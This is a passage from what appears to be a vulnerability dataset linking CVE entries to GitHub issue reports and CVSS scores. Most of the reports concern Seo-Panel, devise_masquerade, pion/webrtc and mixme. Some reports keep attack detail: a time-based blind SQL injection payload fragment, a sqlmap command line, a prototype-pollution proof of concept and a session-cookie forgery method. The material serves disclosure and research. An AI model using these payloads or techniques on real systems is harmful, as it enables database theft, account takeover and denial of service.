e NUMBERTAG sp bd NUMBERTAG lr c NUMBERTAG pc c NUMBERTAG backtrace NUMBERTAG pc NUMBERTAG PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG",
  64814. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64815. "severity": "HIGH",
  64816. "baseScore": 7.5,
  64817. "impactScore": 3.6,
  64818. "exploitabilityScore": 3.9
  64819. },
  64820. {
  64821. "CVE_ID": "CVE-2021-28417",
  64822. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/208",
  64823. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/208",
  64824. "Repo_new": "seopanel/seo-panel",
  64825. "Issue_Created_At": "2021-03-11T19:12:27Z",
  64826. "description": "XSS Vulnerability in \"search_name\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload: APITAG ___ Vulnerable parameter: search_name ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Add below line at the end: APITAG NUMBERTAG APITAG search APITAG NUMBERTAG APITAG NUMBERTAG Hover your mouse near to \"CTR\" field As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  64827. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  64828. "severity": "MEDIUM",
  64829. "baseScore": 4.8,
  64830. "impactScore": 2.7,
  64831. "exploitabilityScore": 1.7
  64832. },
  64833. {
  64834. "CVE_ID": "CVE-2021-28418",
  64835. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/207",
  64836. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/207",
  64837. "Repo_new": "seopanel/seo-panel",
  64838. "Issue_Created_At": "2021-03-11T19:08:43Z",
  64839. "description": "XSS Vulnerability in \"category: parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload : APITAG ___ Vulnerable parameter : category ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Add below line at the end: APITAG NUMBERTAG Hover your mouse to APITAG field As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC : URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  64840. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  64841. "severity": "MEDIUM",
  64842. "baseScore": 4.8,
  64843. "impactScore": 2.7,
  64844. "exploitabilityScore": 1.7
  64845. },
  64846. {
  64847. "CVE_ID": "CVE-2021-28419",
  64848. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/209",
  64849. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/209",
  64850. "Repo_new": "seopanel/seo-panel",
  64851. "Issue_Created_At": "2021-03-13T12:05:18Z",
  64852. "description": "Time based blind SQLi Injection Vulnerability in \"order_col\" parameter. Hi Team I would like to report Time based blind SQLI. Description: SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior. ___ Vulnerable parameter: order_col ___ Step to reproduce the issue NUMBERTAG Login to SEO admin Panel NUMBERTAG Copy paste below link: APITAG NUMBERTAG APITAG search APITAG NUMBERTAG website_id NUMBERTAG Replace value of \"order_col\" parameter with below payloads: Payload: (SELECT NUMBERTAG FROM APITAG NUMBERTAG You can see the page sleeps for NUMBERTAG seconds and maybe some seconds more. ___ Video POC : URLTAG ___ Automated way: sqlmap r FILETAG batch level NUMBERTAG risk NUMBERTAG dbms MYSQL dbs technique=T flush session ___ Impact Attacker can mount one or more of the following type of attacks successfully: \u2022 Reading, updating and deleting arbitrary data/tables from the database \u2022 Executing commands on the underlying operating system",
  64853. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  64854. "severity": "HIGH",
  64855. "baseScore": 7.2,
  64856. "impactScore": 5.9,
  64857. "exploitabilityScore": 1.2
  64858. },
  64859. {
  64860. "CVE_ID": "CVE-2021-28420",
  64861. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/206",
  64862. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/206",
  64863. "Repo_new": "seopanel/seo-panel",
  64864. "Issue_Created_At": "2021-03-11T19:06:01Z",
  64865. "description": "XSS Vulnerablity in \"from_time\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload: APITAG ___ Vulnerable parameter: from_time ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Add below line at the end: APITAG NUMBERTAG Hover your mouse to APITAG field As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  64866. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  64867. "severity": "MEDIUM",
  64868. "baseScore": 4.8,
  64869. "impactScore": 2.7,
  64870. "exploitabilityScore": 1.7
  64871. },
  64872. {
  64873. "CVE_ID": "CVE-2021-28680",
  64874. "Issue_Url_old": "https://github.com/oivoodoo/devise_masquerade/issues/83",
  64875. "Issue_Url_new": "https://github.com/oivoodoo/devise_masquerade/issues/83",
  64876. "Repo_new": "oivoodoo/devise_masquerade",
  64877. "Issue_Created_At": "2021-03-23T20:08:25Z",
  64878. "description": "CVETAG : One layer of security is lost when using devise_masquerade under certain circumstances in versions before NUMBERTAG This is a security vulnerability that has been subject to a NUMBERTAG day disclosure deadline and has been fixed in the NUMBERTAG release of APITAG . I'm creating this issue for traceability inside the APITAG project and to be able to refer to it from the CVE. Ideally a security advisory should be created. If the APITAG variable is somehow leaked, an attacker can become any user by misusing the \"masquerade back\" functionality of this Devise extension, something that is not possible in plain Devise since the attacker must know the victim's password salt to form a valid session cookie to encrypt and sign using APITAG . From the description of CVETAG CVETAG : > The devise_masquerade gem before NUMBERTAG allows certain attacks when a password's salt is unknown. > An application that uses this gem > to let administrators masquerade/impersonate users loses > one layer of security protection compared to a situation where Devise (without this > extension) is used. If the server side secret_key_base value > became publicly known (for instance if it is committed to a public > repository by mistake), there are still other protections in > place that prevent an attacker from impersonating any user on the > site. When masquerading is not used in a plain Devise application, one > must know the password salt of the target user if one wants to encrypt > and sign a valid session cookie. When devise_masquerade is used, > however, an attacker can decide which user the \"back\" action will go > back to without knowing that user's password salt and simply knowing > the user ID, by manipulating the session cookie and pretending that a > user is already masqueraded by an administrator. By adding and setting the dictionary key APITAG to the user ID of the admin victim in the session cookie APITAG object, an attacker can fake that an impersonation has occurred and then use the \"masquerade back\" functionality to become the victim.",
  64879. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64880. "severity": "HIGH",
  64881. "baseScore": 8.1,
  64882. "impactScore": 5.9,
  64883. "exploitabilityScore": 2.2
  64884. },
  64885. {
  64886. "CVE_ID": "CVE-2021-28681",
  64887. "Issue_Url_old": "https://github.com/pion/webrtc/issues/1708",
  64888. "Issue_Url_new": "https://github.com/pion/webrtc/issues/1708",
  64889. "Repo_new": "pion/webrtc",
  64890. "Issue_Created_At": "2021-03-17T22:26:36Z",
  64891. "description": "DTLS Fingerprints in SDP APITAG are not verified. APITAG Your environment. Version: pion/webrtc NUMBERTAG Browser: N/A Other Information reproducable with example/data channels create & example/data channels What did you do? APITAG Run both APITAG and APITAG from example. Once the SDP offer has been generated, decode it with base NUMBERTAG Randomly edit the DTLS fingerprint value in the SDP offer Copy & paste the base NUMBERTAG encoded SDP offer into the waiting APITAG Copy & paste the SDP answer generated by APITAG into APITAG What did you expect? The built in APITAG should throw an error and therefore prevent the data channel from being established. What happened? The data channel was created as usual. CODETAG",
  64892. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  64893. "severity": "MEDIUM",
  64894. "baseScore": 5.3,
  64895. "impactScore": 1.4,
  64896. "exploitabilityScore": 3.9
  64897. },
  64898. {
  64899. "CVE_ID": "CVE-2021-28860",
  64900. "Issue_Url_old": "https://github.com/adaltas/node-mixme/issues/1",
  64901. "Issue_Url_new": "https://github.com/adaltas/node-mixme/issues/1",
  64902. "Repo_new": "adaltas/node-mixme",
  64903. "Issue_Created_At": "2021-04-22T09:23:50Z",
  64904. "description": "Prototype Pollution in Mixme. Hi there, In FILETAG mixme NUMBERTAG an attacker can add or alter properties of an object via '__proto__' through the APITAG and APITAG functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service APITAG POC code: merge({}, APITAG {\"polluted\": APITAG polluted!!!\"}}')) NPM should be notified accordingly. You can contact me regarding the mitigation. Have a great weekend.",
  64905. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  64906. "severity": "CRITICAL",
  64907. "baseScore": 9.1,
  64908. "impactScore": 5.2,
  64909. "exploitabilityScore": 3.9
  64910. },
  64911. {
  64912. "CVE_ID": "CVE-2021-28874",
  64913. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/5769",
  64914. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/5769",
  64915. "Repo_new": "serenityos/serenity",
  64916. "Issue_Created_At": "2021-03-13T22:58:23Z",
  64917. "description": "APITAG Heap buffer overflow in UTF NUMBERTAG BE decoder. Trace: ERRORTAG",
  64918. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64919. "severity": "HIGH",
  64920. "baseScore": 7.8,
  64921. "impactScore": 5.9,
  64922. "exploitabilityScore": 1.8
  64923. },
  64924. {
  64925. "CVE_ID": "CVE-2021-28875",
  64926. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/80894",
  64927. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/80894",
  64928. "Repo_new": "rust-lang/rust",
  64929. "Issue_Created_At": "2021-01-11T01:16:29Z",
